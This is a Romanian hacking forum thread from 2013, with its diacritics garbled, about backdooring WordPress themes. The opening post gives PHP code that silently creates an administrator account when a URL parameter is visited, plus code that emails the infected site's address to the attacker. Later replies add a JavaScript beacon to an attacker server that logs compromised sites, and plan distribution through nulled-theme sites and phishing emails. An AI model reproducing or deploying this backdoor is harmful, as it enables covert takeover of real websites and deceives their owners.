The.Legend Posted July 16, 2013 Report Posted July 16, 2013 (edited) Spargerea unui blog Wordpress cu ajutorul Ingineriei Sociale. Sun? foarte frumos ?i defapt este foarte u?or. Tutorialul ce l-am creat ast?zi pentru voi nu este o idee proprie. M-am inspirat din ceva ce am citit acum foarte mult timp, un scenariu foarte bine pus la punct legat de WordPress ?i anume, cum putem s? lu?m acces la un blog cu elegan?? ?i f?r? a l?sa urme ca s? î?i de-a seama proprietarul.S? d?m un mic exemplu. Domnul Gheorghe vrea s? sparg? cât mai multe blog-uri de pe o anumit? ni?? web. Se gânde?te cum s? fac? un lucru de genul ?sta. Noroc c? Gheorghe este foarte inventiv ?i i-a venit în minte s? creeze ?i s? "infecteze" o tem? (theme) visual?.Mul?i o s? spune?i c? o s? creeze un Remote Code / Command Execution (RCE). Dar nu. Pentru c? ar l?sa urme. A?a c? va ad?uga în tem? un cod PHP care s? adauge automat un nou cont cu drepturi de administrator. Codul este urm?torul:add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}}Ce face codul de mai sus? Dac? este ad?ugat spre exemplu în templates.php (am precizat aceast? fil? deoarece este executat? automat când acces?m index-ul unui blog), oricine va intra pe urm?torul link: http://pentesting/wp/?p=1 (primul articol de pe blog) va crea în baza de date un nou cont cu drepturi de administrator ?i cu numele: Guest ?i parola password. O remarc? important? ar fi aceea c? tema instalat? trebuie s? fie ?i cea activ?.Legat de ingineria social? v? descurca?i voi c? sunte?i baie?i iste?i cu mult timp liber. Pute?i posta online undeva tema ?i s? adauga?i undeva anumite cuvinte pentru a crea un dork s? pute?i g?si blog-urile infectate. Sau îl pute?i manipula chiar pe administrator s? instaleze tema. UpdateOk. Ca s? fie totul complet ?i pentru c? nu am fost mul?umit parc? dac? nu ajutam ?i cu partea asta, adic? cea în care sunte?i informa?i cu ce blog a fost infectat, pe email.<?phpadd_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){ if ( is_user_logged_in() ) { if(!username_exists('wordpress')){ $addr='the.legend@domain.tld'; # Aici pune?i adresa voastr? de email $judul='WP URL'; wp_mail($addr,$judul,get_bloginfo('wpurl')); } }}?>S? v? bucura?i de metod?. ?i ca s? nu v? de-a de gol adresa de mail, pute?i s? o encripta?i în base64. $addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64');S? nu uita?i s? sterge?i tag-urile PHP când ad?uga?i în fil?. Baft?. Edited July 19, 2013 by The.Legend 1 Quote
yoyois Posted July 16, 2013 Report Posted July 16, 2013 Si de ce are titlul asta magnific a la tinkode?Ar trebui numit: Cum sa faci o tema infectata in WP care sa creeze un user nou cu drepturi de admin. Sincer acum. Sa bagi 2-3 linii de cod care sa actioneze ca shell nu e "rocket science". Problema e cum sa pacalesti pe toata lumea sa-si instaleze tema ta.(lucru ft greu de facut). Quote
The.Legend Posted July 16, 2013 Author Report Posted July 16, 2013 (edited) Si de ce are titlul asta magnific a la tinkode?Ar trebui numit: Cum sa faci o tema infectata in WP care sa creeze un user nou cu drepturi de admin. Sincer acum. Sa bagi 2-3 linii de cod care sa actioneze ca shell nu e "rocket science". Problema e cum sa pacalesti pe toata lumea sa-si instaleze tema ta.(lucru ft greu de facut).Ce leg?tur? are TinKode cu thread-ul ?sta? Nu îi pute?i da pace? ?i titlul este ales cu precizie deoarece f?r? inginerie social? nu vei putea crea acel cont de administrator. M? în?elegi acum?Lucrurile grele se rezolv? cu metode simple dar puternice.Legat de p?c?lit cum nume?ti tu, po?i crea o tem? proprie cu anumite cuvinte cheie (inclusiv numele temei) pentru a crea un dork s? cau?i cu el pe google. Dac? eu am un blog personal sau un site de prezentare bazat pe WordPress, automat c? primul lucru pe care îl voi face ar fi cel de a avea o tem? vizual? în concordan?? cu tematica blog-ului.Sau alta ar fi s? anun?i un administrator de blog c? este vulnerabil la un 0day din cauza temei ce o folose?te (înainte de asta, o descarci ?i o infectezi), ?i îi propui s? î?i fac? un update la ea cu ce îi dai tu. Evident c? situa?ia sau discu?ia va fi mult mai elaborat?. Edited July 16, 2013 by The.Legend Quote
SecurityRecord Posted July 16, 2013 Report Posted July 16, 2013 Asta + un designer bun + ThemeForest = . Quote
1337 Posted July 16, 2013 Report Posted July 16, 2013 Ce leg?tur? are TinKode cu thread-ul ?sta? Nu îi pute?i da pace? ?i titlul este ales cu precizie deoarece f?r? inginerie social? nu vei putea crea acel cont de administrator. M? în?elegi acum?Lucrurile grele se rezolv? cu metode simple dar puternice.Legat de p?c?lit cum nume?ti tu, po?i crea o tem? proprie cu anumite cuvinte cheie (inclusiv numele temei) pentru a crea un dork s? cau?i cu el pe google. Dac? eu am un blog personal sau un site de prezentare bazat pe WordPress, automat c? primul lucru pe care îl voi face ar fi cel de a avea o tem? vizual? în concordan?? cu tematica blog-ului.Sau alta ar fi s? anun?i un administrator de blog c? este vulnerabil la un 0day din cauza temei ce o folose?te (înainte de asta, o descarci ?i o infectezi), ?i îi propui s? î?i fac? un update la ea cu ce îi dai tu. Evident c? situa?ia sau discu?ia va fi mult mai elaborat?.Dork : inurl:"wp-TEMA" Quote
xTremeSurfer Posted July 16, 2013 Report Posted July 16, 2013 criptezi cu ceva chestia asta :add_action('wp_head', 'wp_wordpress');function wp_wordpress() {If ($_GET['p'] == '1') {require('wp-includes/registration.php');if (!username_exists('wordpress')) {$user_id = wp_create_user('Guest', 'password');$user = new WP_User($user_id);$user->set_role('administrator');}}} trimiti un email cum ca tu ai fi de la hosting si pentru un trafic ranking nu stiu ce sa puna asta in template.php . asta ar fi o idee Quote
JohnyCNAM Posted July 16, 2013 Report Posted July 16, 2013 Ar trebui sa fie o tema spectaculoasa sa convingi lumea in ziua de azi sa o instaleze. Quote
The.Legend Posted July 16, 2013 Author Report Posted July 16, 2013 Eu v-am detaliat ideea, voi ave?i datoria s? v? folosi?i neuronii pentru a pune-o în aplicare. Quote
Brenin Posted July 16, 2013 Report Posted July 16, 2013 Foarte frumoasa ideea. E un inceput la niste lucruri care pot sa le faci mai departe. Un exemplu ar fi sa distribui tema la N site-uri cu teme, etc, cu o functie de mail sau POST sa te anunte ca e gata. Quote
The.Legend Posted July 16, 2013 Author Report Posted July 16, 2013 Pute?i desc?rca o tem? premium ?i s? o pune?i în locuri gen scriptmafia.com sau warez-bb.org. Sunt sute de mii de bloggeri care au gusturi diferite. Printre aceia se vor num?ra ?i al?ii care s? instaleze tema voastr?. Quote
sebywarlord Posted July 16, 2013 Report Posted July 16, 2013 Ar fii frumos sa poti face codul sa iti trimita si un mail cu site-ul care a activat tema ,asa nu te mai chinui sa cauti pe google! Quote
1337 Posted July 16, 2013 Report Posted July 16, 2013 Mesaj adresat celor care au postat in topicul asta si au dubii asupra metodei.O metoda "spoonfeded":1. Cumparati o tema care nu se gaseste nulled pe net de pe ThemeForest2. Puneti backdoor-ul in tema cumparata3. Ii dati submit pe site-uri care se ocupa cu scripturi/teme NULLEDE ASA GREU? Quote
seboo00111 Posted July 16, 2013 Report Posted July 16, 2013 Tu ne-ai dat codul, nu ne-ai explicat cum sa-l folosim. <- 0% SE Deci poti sa scoti din titlu "Inginerie Sociala" ( care btw suna ca un c***t in Limba Romana ).PS: No hate or w/e, am vrut doar sa fiu scurt si la obiect . Quote
The.Legend Posted July 16, 2013 Author Report Posted July 16, 2013 Tu ne-ai dat codul, nu ne-ai explicat cum sa-l folosim. <- 0% SE Deci poti sa scoti din titlu "Inginerie Sociala" ( care btw suna ca un c***t in Limba Romana ).PS: No hate or w/e, am vrut doar sa fiu scurt si la obiect .?i-am explicat în mare procedeul prin care poate fi pus? în aplicare ideea mea. Fiecare poate dezvolta ideea ca s? î?i îndeplineasc? scopul. Pe scurt pot spune c? am dat un exemplu de inginerie social?. Dac? spui c? sun? ca naiba în român? înseamn? c? insul?i un întreg popor. Dac? a? fi în locul compatrio?ilor t?i a? avea o p?rere de toat? jena fa?? de tine. Baft? pu?tiule. Quote
mitica69 Posted July 16, 2013 Report Posted July 16, 2013 @ sebywarlord"Ar fii frumos sa poti face codul sa iti trimita si un mail cu site-ul care a activat tema ,asa nu te mai chinui sa cauti pe google"Ar fi "bestial" Quote
eusimplu Posted July 16, 2013 Report Posted July 16, 2013 Va faceti o pagina de trimis mail(ca sa nu trimiteti voi direct mail, sa nu dea de banuit) iar dupa o puteti accesa din tema cu javascript(preferabil deoarece cu file_get_contents puteti intampina probleme), acea pagina primeste un parametru cu site-ul de unde a venit REQUEST-ul iar in caz ca nu s-a trimis deja mail cu acel site trimiteti mail-ul si s-a terminat toata treaba Quote
The.Legend Posted July 16, 2013 Author Report Posted July 16, 2013 (edited) Ultima idee este chiar foarte bun?. Am s? m? gândesc la ceva mai silen?ios. Edited July 16, 2013 by tromfil pentru că am șters un mesaj de mai sus. Quote
eusimplu Posted July 17, 2013 Report Posted July 17, 2013 Uite ceva silentios Consta in crearea unei imagini pentru a face REQUEST-ul iar un fisier PHP adauga site-ul intr-un fisier TXT in caz ca nu exista deja. Nu stau sa comentez scriptul, sunt chestii prea simple pentru a fi comentate.Cod JavaScript:var img = new Image(1,1); img.src = 'http://www.anunta-site-spart.com/anunta.php?locatie='+encodeURIComponent(window.location);Cod PHP de la http://www.anunta-site-spart.com/anunta.php :<?php # fisier: /anunta.php# Scopuri educative si bla bla bla$fh = fopen('siteuri-sparte.txt','a+b');preg_match('/https?:\/\/(www\.|)([a-zA-Z0-9\-\.]*)/i', $_GET['locatie'], $bucati_din_adresa);$linii = array();while( ($linie = fgets($fh)) !== false ){ $linii[] = $linie;}if(!in_array($bucati_din_adresa[2], $linii)){ fwrite($fh, $bucati_din_adresa[2].PHP_EOL);}fclose($fh);?> Quote
The.Legend Posted July 18, 2013 Author Report Posted July 18, 2013 Î?i mul?umesc mult c? te-ai implicat ?i c? ai oferit o mân? de ajutor. Deci acum avem tot ce ne trebuie. Metoda. Ideea prin care putem face inginerie social?, ?i cum s? fim alerta?i când un blogger ?i-a instalat tema noastr? infectat?.Dac? cineva reu?e?te s? pun? în aplicare acest tutorial, îl rog s? lase aici un reply cu p?rerea lui. Cum a fost, greu sau u?or, s.a.m.d. Quote
The.Legend Posted July 19, 2013 Author Report Posted July 19, 2013 (edited) Ok. Ca s? fie totul complet ?i pentru c? nu am fost mul?umit parc? dac? nu ajutam ?i cu partea asta, adic? cea în care sunte?i informa?i cu ce blog a fost infectat, pe email.<?phpadd_action('wp_head','wp_wordpressmail');function wp_wordpressmail(){ if ( is_user_logged_in() ) { if(!username_exists('wordpress')){ $addr='the.legend@domain.tld'; # Aici pune?i adresa voastr? de email $judul='WP URL'; wp_mail($addr,$judul,get_bloginfo('wpurl')); } }}?>S? v? bucura?i de metod?. ?i ca s? nu v? de-a de gol adresa de mail, pute?i s? o encripta?i în base64. $addr=base64_decode('#Aici va fi email-ul vostru encriptat în base64');S? nu uita?i s? sterge?i tag-urile PHP când ad?uga?i în fil?. Baft?. Edited July 19, 2013 by The.Legend Quote
mitica69 Posted July 21, 2013 Report Posted July 21, 2013 ca sa profitam mai mult de el,n-ai putea sa-l faci in asa fel incat sa-l punem intr-un plugin nou/existent(adica editam unu deja functional) si sa spunem ca ajuta la seo/commenturi etc,asa cred ca merge mult mai usor sa faci pe cineva sa-l instaleze,asta daca ati inteles la ce-am vrut sa ma refer Quote
The.Legend Posted July 21, 2013 Author Report Posted July 21, 2013 Merge ad?ugat în orice fil? php al wordpress-ului (inclusiv plugins). Trebuie doar s? ?tii loca?ia codului pentru a executa parametrul de ad?ugare a contului de administrator. Quote
FaramirSV Posted July 24, 2013 Report Posted July 24, 2013 (edited) Uite ceva silentios Consta in crearea unei imagini pentru a face REQUEST-ul iar un fisier PHP adauga site-ul intr-un fisier TXT in caz ca nu exista deja. Nu stau sa comentez scriptul, sunt chestii prea simple pentru a fi comentate.Cod JavaScript:var img = new Image(1,1); img.src = 'http://www.anunta-site-spart.com/anunta.php?locatie='+encodeURIComponent(window.location);Cod PHP de la http://www.anunta-site-spart.com/anunta.php :<?php # fisier: /anunta.php# Scopuri educative si bla bla bla$fh = fopen('siteuri-sparte.txt','a+b');preg_match('/https?:\/\/(www\.|)([a-zA-Z0-9\-\.]*)/i', $_GET['locatie'], $bucati_din_adresa);$linii = array();while( ($linie = fgets($fh)) !== false ){ $linii[] = $linie;}if(!in_array($bucati_din_adresa[2], $linii)){ fwrite($fh, $bucati_din_adresa[2].PHP_EOL);}fclose($fh);?>da intradevar,e ceva silentios si merge doar ca in "siteuri-sparte.txt" imi vine doar numele siteuluiex: siteulmeu.roeu vreau sa imi vina si patch... unde a fost uploadatex: siteulmeu.ro/site/images/aveti vre-o solutie pentru mine P.S: am rezolvat,multumiri lui eusimplu Edited July 24, 2013 by FaramirSV Quote